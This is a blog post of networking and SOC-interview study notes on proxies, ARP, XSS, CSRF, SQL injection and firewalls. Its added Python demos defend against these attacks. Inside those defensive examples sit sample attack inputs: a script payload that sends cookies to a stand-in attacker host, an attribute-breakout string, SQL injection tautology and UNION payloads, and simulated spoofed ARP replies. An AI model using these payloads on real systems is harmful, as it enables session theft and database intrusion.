Wednesday, July 21, 2021

proxy server

  •  Forward proxy


A forward proxy is the most common form of a proxy server and is generally used to pass requests from an isolated, private network to the Internet through a firewall. Using a forward proxy, requests from an isolated network, or intranet, can be rejected or allowed to pass through a firewall. 


A forward proxy server will first check to make sure a request is valid. If a request is not valid, or not allowed (blocked by the proxy), it will reject the request resulting in the client receiving an error or a redirect. If a request is valid, a forward proxy may check if the requested information is cached. If it is, the forward proxy serves the cached information. If it is not, the request is sent through a firewall to an actual content server which serves the information to the forward proxy. The proxy, in turn, relays this information to the client and may also cache it, for future requests.


Reverse proxy


A reverse proxy is another common form of a proxy server and is generally used to pass requests from the Internet, through a firewall, to isolated, private networks. It is used to prevent Internet clients from having direct, unmonitored access to sensitive data residing on content servers on an isolated network, or intranet.

If caching is enabled, a reverse proxy can also lessen network traffic by serving cached information rather than passing all requests to actual content servers. 

Reverse proxy servers may also balance workload by spreading requests across a number of content servers.  

One advantage of using a reverse proxy is that Internet clients do not know their requests are being sent to and handled by a reverse proxy server. 


The IBM diagram this text accompanies (not reproduced here) shows a reverse proxy configuration. An Internet client initiates a request to Server A (Proxy Server) which, unknown to the client, is actually a reverse proxy server. The request is allowed to pass through the firewall and is valid but is not cached on Server A. The reverse proxy (Server A) requests the information from Server B (Content Server), which has the information the Internet client is requesting. The information is served to the reverse proxy, where it is cached, and relayed through the firewall to the client. Future requests for the same information are fulfilled from the cache, lessening network traffic and load on the content server (proxy caching is optional and not required for the proxy to function). In this example, all information originates from one content server (Server B).
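The flow just described, as an added example that is not part of the IBM article: a small reverse proxy (Server A) in front of two content servers (Server B and a second one), round-robin load balancing between them and caching responses by path. Everything binds to ephemeral localhost ports, and the `X-Cache` header, the backend names and the `demo()` helper are my own conventions for showing what the client sees. The client talks only to the proxy and never learns which backend answered.

```python
"""Minimal caching, load-balancing reverse proxy (added example, not the IBM article's code)."""
import itertools
import threading
import urllib.request
from http.server import BaseHTTPRequestHandler, ThreadingHTTPServer

# Ignore any system proxy settings so the demo stays on localhost.
_opener = urllib.request.build_opener(urllib.request.ProxyHandler({}))


def make_backend_handler(name):
    """Content server (Server B in the text) that reports its own name in the body."""
    class Backend(BaseHTTPRequestHandler):
        def do_GET(self):
            body = f"{name} served {self.path}".encode()
            self.send_response(200)
            self.send_header("Content-Type", "text/plain")
            self.send_header("Content-Length", str(len(body)))
            self.end_headers()
            self.wfile.write(body)

        def log_message(self, *args):  # keep the demo quiet
            pass
    return Backend


class ReverseProxy:
    """Server A: round-robins requests over backends and caches bodies by path."""

    def __init__(self, backend_ports):
        self._ports = itertools.cycle(backend_ports)
        self._cache = {}
        self._lock = threading.Lock()

    def handler(self):
        proxy = self

        class Handler(BaseHTTPRequestHandler):
            server_version = "reverse-proxy"   # hide the Python server banner from clients
            sys_version = ""

            def do_GET(self):
                with proxy._lock:
                    body = proxy._cache.get(self.path)
                if body is not None:
                    return self._reply(body, "HIT")          # served from cache, no backend traffic
                port = next(proxy._ports)                     # pick the next content server
                with _opener.open(f"http://127.0.0.1:{port}{self.path}") as resp:
                    body = resp.read()
                with proxy._lock:
                    proxy._cache[self.path] = body            # optional proxy caching
                self._reply(body, "MISS")

            def _reply(self, body, cache_state):
                self.send_response(200)
                self.send_header("Content-Type", "text/plain")
                self.send_header("Content-Length", str(len(body)))
                self.send_header("X-Cache", cache_state)
                self.end_headers()
                self.wfile.write(body)

            def log_message(self, *args):
                pass
        return Handler


def serve(handler_cls):
    """Start an HTTP server on an ephemeral localhost port in a daemon thread."""
    srv = ThreadingHTTPServer(("127.0.0.1", 0), handler_cls)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv


def fetch(url):
    """Return (body, X-Cache header) exactly as the Internet client observes them."""
    with _opener.open(url) as resp:
        return resp.read().decode(), resp.headers.get("X-Cache")


def demo():
    """Two content servers behind one proxy; returns what the client observed for three requests."""
    b1 = serve(make_backend_handler("backend-A"))
    b2 = serve(make_backend_handler("backend-B"))
    proxy = serve(ReverseProxy([b1.server_address[1], b2.server_address[1]]).handler())
    base = f"http://127.0.0.1:{proxy.server_address[1]}"
    try:
        return [fetch(base + path) for path in ("/index.html", "/index.html", "/about")]
    finally:
        for srv in (proxy, b1, b2):
            srv.shutdown()
            srv.server_close()


if __name__ == "__main__":
    for body, state in demo():
        print(f"{state:4} {body}")
```

The second request for /index.html is answered from the proxy's cache (HIT) and never reaches a content server; the request for /about is a MISS that round-robins to the second backend. A real deployment would also need cache-control handling, request filtering and TLS termination, which this demo omits.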


Proxy chaining


A proxy chain uses two or more proxy servers to assist in server and protocol performance and network security. Proxy chaining is not a type of proxy, but a use of reverse and forward proxy servers across multiple networks. In addition to the benefits to security and performance, proxy chaining allows requests from different protocols to be fulfilled in cases where, without chaining, such requests would not be possible or permitted. 


For example, a request using HTTP is sent to a server that can only handle FTP requests. In order for the request to be processed, it must pass through a server that can handle both protocols. This can be accomplished by making use of proxy chaining which allows the request to be passed from a server that is not able to fulfill such a request (perhaps due to security or networking issues, or its own limited capabilities) to a server that can fulfill such a request. 


https://www.ibm.com/docs/en/i/7.2?topic=concepts-proxy-server-types








How does ARP work?

  •  How ARP works

When a new computer joins a LAN, it is assigned a unique IP address to use for identification and communication

When an incoming packet destined for a host machine on a particular LAN arrives at a gateway, the gateway asks the ARP program to find a MAC address that matches the IP address

A table called the ARP cache maintains a record of each IP address and its corresponding MAC address.

All operating systems in an IPv4 Ethernet network keep an ARP cache.

Every time a host requests a MAC address in order to send a packet to another host in the LAN, it checks its ARP cache to see if the IP to MAC address translation already exists.

If the translation does not already exist, then the request for network addresses is sent and ARP is performed.


ARP broadcasts a request packet to all the machines on the LAN and asks if any of the machines know they are using that particular IP address. When a machine recognizes the IP address as its own, it sends a reply so ARP can update the cache for future reference and proceed with the communication.


Host machines that don't know their own IP address can use the Reverse ARP (RARP) protocol for discovery.


ARP only resolves addresses on the local network segment. For a destination outside the LAN, the host first consults its routing table to pick the next hop, usually the default gateway (a router), and then sends an ARP request for the gateway's MAC address; the router forwards the packets onward to their intended destinations.


ARP spoofing and ARP cache poisoning

Any LAN that uses ARP must be wary of ARP spoofing, also referred to as ARP poison routing or ARP cache poisoning.

ARP spoofing is an attack in which an attacker sends forged ARP messages on a LAN in order to link the attacker's MAC address with the IP address of a legitimate computer or server (often the default gateway). Once a victim's ARP cache holds the forged mapping, frames meant for the legitimate IP address go to the attacker's machine first, which can read or modify them and forward them on, giving the attacker a man-in-the-middle position.


https://searchnetworking.techtarget.com/definition/Address-Resolution-Protocol-ARP





ARP Request / ARP Reply (packet-capture screenshots from the linuxhint article, not reproduced here)


  • RARP: It is the opposite of the normal ARP discussed above: you have the MAC address of PC2 but not its IP address. Some specific cases need RARP.

https://linuxhint.com/arp_packet_analysis_wireshark/

  • The Reverse Address Resolution Protocol (RARP) is an obsolete computer communication protocol used by a client computer to request its Internet Protocol (IPv4) address from a computer network, when all it has available is its link layer or hardware address, such as a MAC address. The client broadcasts the request and does not need prior knowledge of the network topology or the identities of servers capable of fulfilling its request.

https://en.wikipedia.org/wiki/Reverse_Address_Resolution_Protocol



  • Configuring Gratuitous ARP
Gratuitous Address Resolution Protocol (ARP) requests help detect duplicate IP addresses.
A gratuitous ARP is a broadcast request for a router’s own IP address. If a router or switch sends an ARP request for its own IP address and no ARP replies are received, the router- or switch-assigned IP address is not being used by other nodes

However, if a router or switch sends an ARP request for its own IP address and an ARP reply is received, the router- or switch-assigned IP address is already being used by another node.


https://www.juniper.net/documentation/us/en/software/junos/multicast-l2/topics/task/interfaces-configuring-gratuitous-arp.html

  • Gratuitous ARP
Gratuitous ARP could mean both gratuitous ARP request or gratuitous ARP reply. Gratuitous in this case means a request/reply that is not normally needed according to the ARP specification (RFC 826) but could be used in some cases. 

A gratuitous ARP request is an Address Resolution Protocol request packet where the source and destination IP are both set to the IP of the machine issuing the packet and the destination MAC of the Ethernet frame carrying it is the broadcast address ff:ff:ff:ff:ff:ff.

Gratuitous ARPs are useful for four reasons:

They can help detect IP conflicts. When a machine receives an ARP request containing a source IP that matches its own, then it knows there is an IP conflict.

They assist in the updating of other machines' ARP tables. Clustering solutions utilize this when they move an IP from one NIC to another, or from one machine to another. Other machines maintain an ARP table that contains the MAC associated with an IP. When the cluster needs to move the IP to a different NIC, be it on the same machine or a different one, it reconfigures the NICs appropriately then broadcasts a gratuitous ARP reply to inform the neighboring machines about the change in MAC for the IP. Machines receiving the ARP packet then update their ARP tables with the new MAC

They inform switches of the MAC address of the machine on a given switch port, so that the switch knows that it should transmit packets sent to that MAC address on that switch port.


Every time an IP interface or link goes up, the driver for that interface will typically send a gratuitous ARP to preload the ARP tables of all other local hosts. Thus, a gratuitous ARP will tell us that that host just has had a link up event, such as a link bounce, a machine just being rebooted or the user/sysadmin on that host just configuring the interface up. If we see multiple gratuitous ARPs from the same host frequently, it can be an indication of bad Ethernet hardware/cabling resulting in frequent link bounces

https://wiki.wireshark.org/Gratuitous_ARP
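The ARP request/reply exchange, the gratuitous announcement and the spoofing described above, as an added example that is not part of the TechTarget or Wireshark articles. It builds and parses the 28-byte Ethernet/IPv4 ARP payload with `struct` (the Ethernet header is left out), flags gratuitous packets by the sender-IP-equals-target-IP rule, and runs a passive watcher that raises an alert when the MAC behind an IP changes. The MAC and IP values, the `ArpWatcher` class and the traffic in `demo()` are constructed for the example.

```python
"""ARP packets, gratuitous ARP and IP-to-MAC change detection (added example)."""
import struct

# ARP payload for Ethernet/IPv4 (RFC 826). The 14-byte Ethernet header that carries it is
# not included here; "broadcast" in the text refers to that frame's destination address.
ARP = struct.Struct("!HHBBH6s4s6s4s")   # htype, ptype, hlen, plen, oper, sha, spa, tha, tpa
REQUEST, REPLY = 1, 2
ZERO_MAC = "00:00:00:00:00:00"           # target MAC in a request is unknown, so zeros


def mac_to_bytes(mac):
    return bytes(int(x, 16) for x in mac.split(":"))


def ip_to_bytes(ip):
    return bytes(int(x) for x in ip.split("."))


def bytes_to_mac(b):
    return ":".join(f"{x:02x}" for x in b)


def bytes_to_ip(b):
    return ".".join(str(x) for x in b)


def build_arp(oper, sha, spa, tha, tpa):
    return ARP.pack(1, 0x0800, 6, 4, oper,
                    mac_to_bytes(sha), ip_to_bytes(spa), mac_to_bytes(tha), ip_to_bytes(tpa))


def parse_arp(payload):
    htype, ptype, hlen, plen, oper, sha, spa, tha, tpa = ARP.unpack(payload[:ARP.size])
    if (htype, ptype, hlen, plen) != (1, 0x0800, 6, 4):
        raise ValueError("not an Ethernet/IPv4 ARP packet")
    return {"oper": oper, "sha": bytes_to_mac(sha), "spa": bytes_to_ip(spa),
            "tha": bytes_to_mac(tha), "tpa": bytes_to_ip(tpa)}


def is_gratuitous(arp):
    # The sender asks about (or announces) its own address: sender IP == target IP.
    return arp["spa"] == arp["tpa"]


class ArpWatcher:
    """Passive ARP cache that reports when the MAC behind an IP changes."""

    def __init__(self):
        self.cache = {}      # ip -> mac, the same mapping a host's own ARP cache holds
        self.alerts = []

    def observe(self, payload):
        arp = parse_arp(payload)
        ip, mac = arp["spa"], arp["sha"]       # every ARP packet carries the sender's binding
        previous = self.cache.get(ip)
        if previous is not None and previous != mac:
            self.alerts.append(f"{ip} moved from {previous} to {mac}")
        self.cache[ip] = mac
        return arp


def demo():
    """Constructed LAN traffic: normal resolution, a gratuitous announcement, then a spoofed reply."""
    gateway, host, newcomer, attacker = ("aa:bb:cc:00:00:01", "aa:bb:cc:00:00:05",
                                         "aa:bb:cc:00:00:07", "de:ad:be:ef:00:01")
    stream = [
        build_arp(REQUEST, host, "10.0.0.5", ZERO_MAC, "10.0.0.1"),      # who has 10.0.0.1?
        build_arp(REPLY, gateway, "10.0.0.1", host, "10.0.0.5"),         # 10.0.0.1 is at the gateway
        build_arp(REQUEST, newcomer, "10.0.0.7", ZERO_MAC, "10.0.0.7"),  # gratuitous: link just came up
        build_arp(REPLY, attacker, "10.0.0.1", host, "10.0.0.5"),        # spoofed: gateway IP, attacker MAC
    ]
    watcher = ArpWatcher()
    gratuitous = [arp["spa"] for arp in map(watcher.observe, stream) if is_gratuitous(arp)]
    return watcher.cache, watcher.alerts, gratuitous


if __name__ == "__main__":
    cache, alerts, gratuitous = demo()
    print("cache:", cache)
    print("gratuitous announcements from:", gratuitous)
    print("alerts:", alerts)
```

The watcher cannot distinguish a spoofed reply from the legitimate gratuitous ARP a cluster sends when it moves an IP to another NIC (both change the mapping), so in practice the alert is correlated with known failover MACs and link-up events. Switch features such as Dynamic ARP Inspection do the equivalent check against DHCP snooping data.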


Ports and Protocols

  •  This is a list of TCP and UDP port numbers used by protocols for operation of network applications.

https://en.wikipedia.org/wiki/List_of_TCP_and_UDP_port_numbers




soc analyst interview question

  •  1. Explain risk, vulnerability and threat?

A vulnerability (weakness) is a gap in the protection of a system; a threat is an actor or event (for example an attacker) that could exploit that weakness; risk is the measure of potential loss if the vulnerability is exploited by the threat, often expressed as likelihood times impact.


2. What is the difference between Asymmetric and Symmetric encryption and which one is better?

Symmetric encryption uses the same key for both encryption and decryption, while Asymmetric encryption uses different keys for encryption and decryption.

Symmetric encryption is usually much faster, but both parties need the same key, so the key has to be distributed over a secure channel beforehand. Asymmetric encryption solves that distribution problem (the public key can be shared openly) but is far slower and practical only for small messages.

Hence, a hybrid approach is used in practice: set up a channel using asymmetric cryptography to agree on a session key, then encrypt the data with a symmetric cipher. This is what TLS does.


4. What is XSS, how will you mitigate it?

Cross-site scripting is an injection vulnerability in web applications in which attacker-controlled input ends up in a page as HTML or JavaScript.

It occurs when user input (from form fields, URL parameters, or previously stored data) is placed into the page without validation and, more importantly, without output encoding for the context where it lands.

This leads to untrusted data being rendered and executed in the browsers of other users. Countermeasures against XSS are input validation, context-aware output encoding, and a Content Security Policy (CSP) that restricts where scripts may load from.


5. What is the difference between encryption and hashing?

Encryption is reversible (with the key) whereas hashing is irreversible. Unsalted password hashes can be recovered with precomputed rainbow tables, and weak hash functions are subject to collision attacks, but a hash is still not reversible in the mathematical sense.

Encryption ensures confidentiality whereas hashing ensures Integrity.


7. What is CSRF?

Cross-Site Request Forgery is a web application vulnerability in which the server cannot tell whether a request was intentionally sent by the user or triggered by a malicious site in the user's browser: the browser automatically attaches the session cookie either way, so the request is just processed. Defences are anti-CSRF tokens bound to the session, checking the Origin/Referer header, and SameSite cookies.
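The defences just listed, as an added example that is not part of the siemxpert post: an Origin check and a session-bound anti-CSRF token verified with a constant-time HMAC comparison, applied to a few constructed requests. The secret key, the allowed origin `https://app.example`, the session identifiers and the dict-shaped `request` object standing in for a web framework's request are all assumptions of the example.

```python
"""CSRF defence: Origin check plus a session-bound anti-CSRF token (added example)."""
import hashlib
import hmac
import secrets
from urllib.parse import urlsplit

SECRET_KEY = secrets.token_bytes(32)        # server-side key (hypothetical; rotate per deployment)
ALLOWED_ORIGINS = {"https://app.example"}   # hypothetical site origin


def issue_csrf_token(session_id):
    """nonce.HMAC(key, session_id:nonce): a foreign site can neither read it (same-origin policy)
    nor forge it (it lacks the key), and a token issued for one session fails for another."""
    nonce = secrets.token_hex(16)
    mac = hmac.new(SECRET_KEY, f"{session_id}:{nonce}".encode(), hashlib.sha256).hexdigest()
    return f"{nonce}.{mac}"


def verify_csrf_token(session_id, token):
    try:
        nonce, mac = token.split(".", 1)
    except (AttributeError, ValueError):
        return False
    expected = hmac.new(SECRET_KEY, f"{session_id}:{nonce}".encode(), hashlib.sha256).hexdigest()
    return hmac.compare_digest(mac, expected)      # constant-time comparison


def _site(url):
    parts = urlsplit(url)
    return f"{parts.scheme}://{parts.netloc}"


def authorize_state_change(request, session_id):
    """request is a plain dict {'method', 'headers', 'form'} standing in for a framework request."""
    if request["method"] not in ("POST", "PUT", "PATCH", "DELETE"):
        return False, "state changes must not be accepted on GET"
    origin = request["headers"].get("Origin") or request["headers"].get("Referer")
    if not origin or _site(origin) not in ALLOWED_ORIGINS:
        return False, "missing or foreign Origin"
    if not verify_csrf_token(session_id, request["form"].get("csrf_token")):
        return False, "invalid CSRF token"
    return True, "ok"


def demo():
    """Constructed requests as the browser would send them; the session cookie rides on all of them."""
    session = "sess-7f3a"
    token = issue_csrf_token(session)
    good = {"method": "POST", "headers": {"Origin": "https://app.example"},
            "form": {"to": "bob", "amount": "10", "csrf_token": token}}
    forged = {"method": "POST", "headers": {"Origin": "https://evil.example"},
              "form": {"to": "mallory", "amount": "9999"}}
    replayed = {"method": "POST", "headers": {"Origin": "https://app.example"},
                "form": {"to": "mallory", "amount": "9999",
                         "csrf_token": issue_csrf_token("sess-other")}}
    via_get = {"method": "GET", "headers": {"Origin": "https://app.example"},
               "form": {"to": "mallory", "amount": "9999", "csrf_token": token}}
    return {name: authorize_state_change(req, session)
            for name, req in (("good", good), ("forged", forged),
                              ("replayed", replayed), ("via_get", via_get))}


if __name__ == "__main__":
    for name, (ok, reason) in demo().items():
        print(f"{name:9} {'ALLOW' if ok else 'BLOCK':5} {reason}")
```

Browsers attach the Origin header to cross-site POSTs, so the forged request is refused before the token is even looked at; the token is the backstop for cases where Origin is absent or the attacker has a same-site foothold. Setting the session cookie with `SameSite=Lax` or `Strict` adds a third, browser-enforced layer.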


13. CIA triangle?

Confidentiality: Keeping the information secret.

Integrity: Keeping the information unaltered.

Availability: Information is available to the authorised parties at all times.


14. HIDS vs NIDS and which one is better and why?

HIDS is a host-based intrusion detection system and NIDS is a network-based intrusion detection system. Both work on similar lines; the placement differs. A HIDS agent runs on each host (seeing processes, files and logs) whereas a NIDS sits at a network chokepoint (seeing traffic between hosts). This source prefers NIDS for an enterprise because a HIDS is harder to manage and consumes host resources; in practice the two are complementary, since a NIDS cannot see inside encrypted traffic or activity that never leaves the host.


20. Various response codes from a web application?

1xx – Informational responses

2xx – Success

3xx – Redirection

4xx – Client-side error

5xx – Server side error



30. What is a false positive and false negative in case of IDS?

When the device generates an alert for an intrusion that has not actually happened, that is a false positive; when the device generates no alert although an intrusion has actually happened, that is a false negative.


 

https://www.siemxpert.com/blog/soc-analyst-interview-question/


  • Question 4: What is the three-way handshake?

Three-way handshake mechanism: the client sends a TCP packet with the SYN flag set to the server, requesting a connection (synchronizing) and announcing its initial sequence number. The server responds with a SYN/ACK packet, acknowledging the client's sequence number (ack = client sequence + 1) and announcing its own initial sequence number. The client then sends an ACK packet acknowledging the server's sequence number (ack = server sequence + 1), and the connection is established on both sides.


Question 6: What is data leakage? Explain in your own words.

Answer: Data leakage refers to the exposure or transmission of an organization’s sensitive data to the external recipient. The data may be transmitted or exposed via the internet or by physical means.


Question 7: List the steps to develop the Data Loss Prevention (DLP) strategy?

Answer: The steps to develop and implement a DLP strategy are as follows:

Step1: prioritizing the critical data assets

Step2: categorizing the data based on its source

Step3: analyzing which data is more prone to the risks

Step4: monitor the transmission of the data

Step5: developing control measures to mitigate the data leakage risk


Question 8: What is the difference between TCP and UDP?


TCP (Transmission Control Protocol)

TCP is reliable as it guarantees the delivery of data packets to the destination.

TCP is heavyweight.

TCP is slower as compared to UDP

Example: HTTP, SSH, HTTPS, SMTP


UDP(User Datagram Protocol)

UDP is not reliable as it does not guarantee the delivery of datagrams to the destination.

UDP is lightweight.

UDP IS faster than TCP

Example: TFTP, VoIP, online multiplayer games


Question 9: What is the difference between firewall deny and drop?

Answer: DENY (REJECT) RULE: the firewall blocks the connection and sends a response back to the requester (a TCP RST or an ICMP unreachable message). The requester fails immediately and learns that a firewall is deployed.

DROP RULE: If the firewall is set to drop rule, it will block the connection request without notifying the requester.

A common practice is to reject (deny) outgoing traffic, so internal clients fail fast instead of waiting for timeouts, and to drop unsolicited incoming traffic, so an external attacker cannot tell whether a host is behind a firewall or whether the port is simply unused. Dropping also slows down port scanners, since each probe has to time out.


Question 11: What is the Runbook in SOC?

A runbook, also known as a standard operating procedure (SOP), consists of a set of guidelines to handle security incidents and alerts in the Security Operation Centre. The L1 security analyst generally uses it for better assessment and documentation of the security events.


Question 12: What is the difference between the Red Team and the Blue Team?

Red Team: The red team plays an offensive role. The team conducts rigorous exercises to penetrate the security infrastructure and identify the exploitable vulnerabilities in it. The red team is generally hired by the organization to test the defenses.

Blue Team: The blue team plays a defensive role. The blue team’s role is to defend the organization’s security infrastructure by detecting the intrusion. The members of a blue team are internal security professionals of the organization.


Question 13: Define a Phishing attack and how to prevent it?

Answer: Phishing is a type of social engineering attack in which an attacker tricks the target into revealing sensitive information or performing an action (opening an attachment, entering credentials on a fake site) by creating urgency, using threats, impersonating a trusted party, or offering incentives. Spear phishing (targeted at an individual), smishing (SMS) and vishing (voice) are variants, and bulk e-mail spam is a common delivery vehicle; session hijacking is a separate attack rather than a phishing type. Prevention combines user awareness training, mail filtering with sender authentication (SPF, DKIM, DMARC), phishing-resistant multi-factor authentication, and a fast reporting path to the SOC.


Question 14: What is the Cross-Site Scripting (XSS) attack, and how to prevent it?

Answer: In a cross-site scripting attack the attacker gets malicious script to execute in the victim's browser in the context of a trusted web page, and can steal session cookies or other sensitive information. With an XSS vulnerability the attacker can deliver further malware, read out user information, perform actions as the user, and deface the website.


Countermeasures:

    Encoding the output

    Applying filters at the point where input is received

    Using appropriate response headers

    Enabling content security policy

    Escaping untrusted characters
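Output encoding and the CSP header from the countermeasure lists of question 4 (siemxpert) and question 14 (infosectrain), as an added example that is not part of either post: a vulnerable string-concatenation renderer beside a hardened one that escapes per context (HTML text, attribute value, URL path), tried against a script-tag payload and an attribute-breakout payload. The `contains_active_markup` helper is a demo-only check so the result can be asserted, not a real XSS detector.

```python
"""Vulnerable vs. hardened rendering of untrusted input, plus a CSP header (added example)."""
import html
from urllib.parse import quote

# Restricts script sources to the site's own origin; inline scripts injected via XSS are refused.
CSP_HEADER = ("Content-Security-Policy",
              "default-src 'self'; script-src 'self'; object-src 'none'; base-uri 'none'")


def render_vulnerable(display_name):
    # Raw concatenation: whatever the user typed becomes markup in every viewer's browser.
    return f"<p>Hello, {display_name}!</p>"


def render_hardened(display_name, profile_slug):
    # Context-aware output encoding: HTML-escape text and attribute values (quote=True also
    # escapes " and ' so the value cannot close the attribute), percent-encode the URL path part.
    safe_name = html.escape(display_name, quote=True)
    safe_slug = quote(profile_slug, safe="")
    return f'<p>Hello, <a href="/users/{safe_slug}" title="{safe_name}">{safe_name}</a>!</p>'


def contains_active_markup(page):
    """Demo-only check: does the rendered page still carry a live script tag or event handler?
    (The escaping step above is the real control; this just makes the outcome visible.)"""
    lowered = page.lower()
    return any(marker in lowered for marker in ("<script", 'onerror="', 'onmouseover="'))


def demo():
    """Constructed payloads: a script-tag injection and an attribute breakout."""
    script_payload = '<script>fetch("https://evil.example/?c=" + document.cookie)</script>'
    attribute_payload = 'x" onmouseover="alert(1)'
    return {
        "vulnerable_script": contains_active_markup(render_vulnerable(script_payload)),
        "hardened_script": contains_active_markup(render_hardened(script_payload, "alice")),
        "vulnerable_attr": contains_active_markup(f'<a title="{attribute_payload}">'),
        "hardened_attr": contains_active_markup(render_hardened(attribute_payload, "alice")),
    }


if __name__ == "__main__":
    for case, active in demo().items():
        print(f"{case:18} {'EXECUTABLE' if active else 'inert'}")
    print(*CSP_HEADER, sep=": ")
```

Encoding must match the context the data lands in: `html.escape` is correct for element text and quoted attributes but not for a JavaScript string literal or a URL, each of which needs its own encoder. The CSP is defence in depth for the cases where encoding was missed, and is only effective once the page has no inline scripts left for it to whitelist.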



Question 15: Explain the SQL injection vulnerability and give countermeasures to prevent it?

Answer: SQL injection is a well-known web application vulnerability that lets an attacker interfere with the queries a web application sends to its database. The attacker supplies input that is concatenated into an SQL statement and changes its meaning, and can then retrieve, alter or delete data, and in some cases cause a denial of service (for example by dropping tables or issuing expensive queries).


Countermeasures:

    Using parameterized queries

    Validating the inputs

    Using stored procedures (this only helps when the procedure itself does not build SQL dynamically from its arguments)

    Deploying a web application firewall

    Escaping untrusted characters
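The first countermeasure, parameterized queries, beside the vulnerable pattern it replaces, as an added example that is not part of the infosectrain post. It runs a string-built lookup and a parameterized lookup against a constructed in-memory SQLite table with two classic payloads: a tautology that dumps every row and a UNION that pulls the admin rows the query was never meant to expose. The table, rows and payload strings are constructed for the example.

```python
"""String-built query vs. parameterized query against an in-memory SQLite database (added example)."""
import sqlite3


def make_db():
    """Constructed sample data; nothing here comes from a real system."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, email TEXT, is_admin INTEGER)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", [
        ("alice", "alice@example.test", 1),
        ("bob", "bob@example.test", 0),
        ("carol", "carol@example.test", 0),
    ])
    return conn


def lookup_vulnerable(conn, username):
    # The input is pasted into the SQL text, so a quote in it ends the string literal
    # and the rest of the input is parsed as SQL.
    sql = f"SELECT username, email FROM users WHERE username = '{username}'"
    return conn.execute(sql).fetchall()


def lookup_parameterized(conn, username):
    # The driver transmits the value separately from the statement; it is only ever compared as data.
    return conn.execute("SELECT username, email FROM users WHERE username = ?", (username,)).fetchall()


# Two classic payloads: a tautology (dump every row) and a UNION (pull rows the query never exposed).
TAUTOLOGY = "' OR '1'='1"
UNION_ADMINS = "nobody' UNION SELECT username, email FROM users WHERE is_admin = 1 --"


def demo():
    conn = make_db()
    return {
        "vulnerable_tautology": lookup_vulnerable(conn, TAUTOLOGY),
        "vulnerable_union": lookup_vulnerable(conn, UNION_ADMINS),
        "parameterized_tautology": lookup_parameterized(conn, TAUTOLOGY),
        "parameterized_union": lookup_parameterized(conn, UNION_ADMINS),
        "parameterized_normal": lookup_parameterized(conn, "bob"),
    }


if __name__ == "__main__":
    for case, rows in demo().items():
        print(f"{case:24} {rows}")
```

With the parameter marker the payloads simply match no username. Escaping quotes by hand (the last item in the list above) is the weakest option, because it must be redone per database dialect and per context (numbers, identifiers, LIKE patterns), while parameters cover the common case uniformly.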


Question 16: Difference between hashing and Encryption?


Hashing

Conversion of data into a fixed-length of unreadable strings using algorithms

Hashed data can not be reverted back into readable strings

The length of the hashed string is fixed

No keys are used in hashing


Encryption

Conversion of data into an unreadable string using cryptographic keys

Encrypted data can be decrypted back into readable strings

The length of the encrypted string is not fixed

Keys are used in Encryption
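The hashing side of question 5 (siemxpert) and question 16 (infosectrain), as an added example that is not part of either post: fixed-length, one-way SHA-256 digests, salted and iterated password hashing with PBKDF2 (the mitigation for the rainbow-table attack mentioned under question 5) verified with a constant-time comparison, and a keyed HMAC for integrity. Standard library only; the format string for stored hashes is my own convention.

```python
"""Fixed-length one-way hashing, salted password storage and keyed integrity tags (added example)."""
import hashlib
import hmac
import os


def digest(data: bytes) -> str:
    """SHA-256 of any input is 32 bytes (64 hex chars); the input cannot be recovered from it."""
    return hashlib.sha256(data).hexdigest()


def hash_password(password: str, salt: bytes = None, iterations: int = 600_000) -> str:
    """PBKDF2 with a random per-user salt: identical passwords yield different hashes, so one
    precomputed (rainbow) table cannot cover all users, and the iteration count slows each guess."""
    salt = salt or os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${dk.hex()}"   # own storage format


def verify_password(password: str, stored: str) -> bool:
    _algo, iterations, salt_hex, dk_hex = stored.split("$")
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), bytes.fromhex(salt_hex), int(iterations))
    return hmac.compare_digest(dk.hex(), dk_hex)   # constant-time comparison


def integrity_tag(key: bytes, message: bytes) -> str:
    """HMAC, a keyed hash: a bare hash only detects accidental change (anyone can recompute it);
    the keyed tag also proves the message came from someone holding the key."""
    return hmac.new(key, message, hashlib.sha256).hexdigest()


if __name__ == "__main__":
    print(digest(b"a"), len(digest(b"a" * 100_000)))
    stored = hash_password("correct horse battery staple")
    print(stored)
    print(verify_password("correct horse battery staple", stored),
          verify_password("wrong", stored))
    print(integrity_tag(b"shared-key", b"amount=10"))
```

For new systems argon2 or bcrypt are preferable to PBKDF2, but they need a third-party package; the principle (salt, slow function, constant-time compare) is the same.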


Question 18: What is the difference between SIEM and IDS?

Both collect the log data, but unlike SIEM, IDS does not facilitate event correlation and centralization of log data.


Question 20: What is DNS? Why is DNS monitoring essential?

Answer: DNS (Domain Name System) translates host names into IP addresses and is consulted before almost every connection, so its logs are a compact record of what systems are trying to reach. DNS monitoring can disclose information such as websites visited by employees, malicious domains accessed by an end user, or malware contacting a command-and-control server, and it can help identify and thwart cyberattacks early.


https://www.infosectrain.com/blog/20-most-common-soc-analyst-interview-questions-and-answers/ 


  • How does a Web Application Firewall work?
A WAF examines and filters traffic to web applications. It keeps track of communication between the client and server, and server and server
A WAF protects against some of the most common cyber attacks, including SQL injections, cross-site scripting and (D)DoS attacks
When you first define communication and access, you let the WAF monitor traffic for a period of time so that it can learn what legitimate traffic looks like. It then creates a default mode and the WAF can then keep track of unusual traffic patterns

What are the differences between Web Application Firewalls and traditional firewalls?
Application firewalls are on a higher level in the OSI model compared to traditional firewalls.
If a new type of hacker attack is discovered you can update the WAF software with the attack signature, which enables it to learn the patterns of that traffic and block it. 

What are the benefits of using a WAF?
A common view is that it is better to protect the application itself than only the server it runs on. A WAF inspects traffic at the application layer, which gives a deeper level of detail than a traditional firewall and allows more finely tuned protection. A WAF can reduce the risk of data loss, data corruption and spoofing, though it complements secure coding rather than replacing it.

https://complior.se/questions-and-answers-about-waf/
There are several types of firewalls but the most common one is the hardware network firewall. 
Basic firewalls work at Layer 3 and Layer 4 of the OSI model

a network firewall is stateful. This means that the firewall keeps track of the states of connections that pass through it.
For example, if an internal host successfully accesses an Internet website through the firewall, the latter will keep the connection inside its connection table so that reply packets from the external web server will be allowed to pass to the internal host because they already belong to an established connection.

Next-Generation Firewalls work all the way up to Layer 7 of the OSI models which means they are able to inspect and control traffic at the application level.

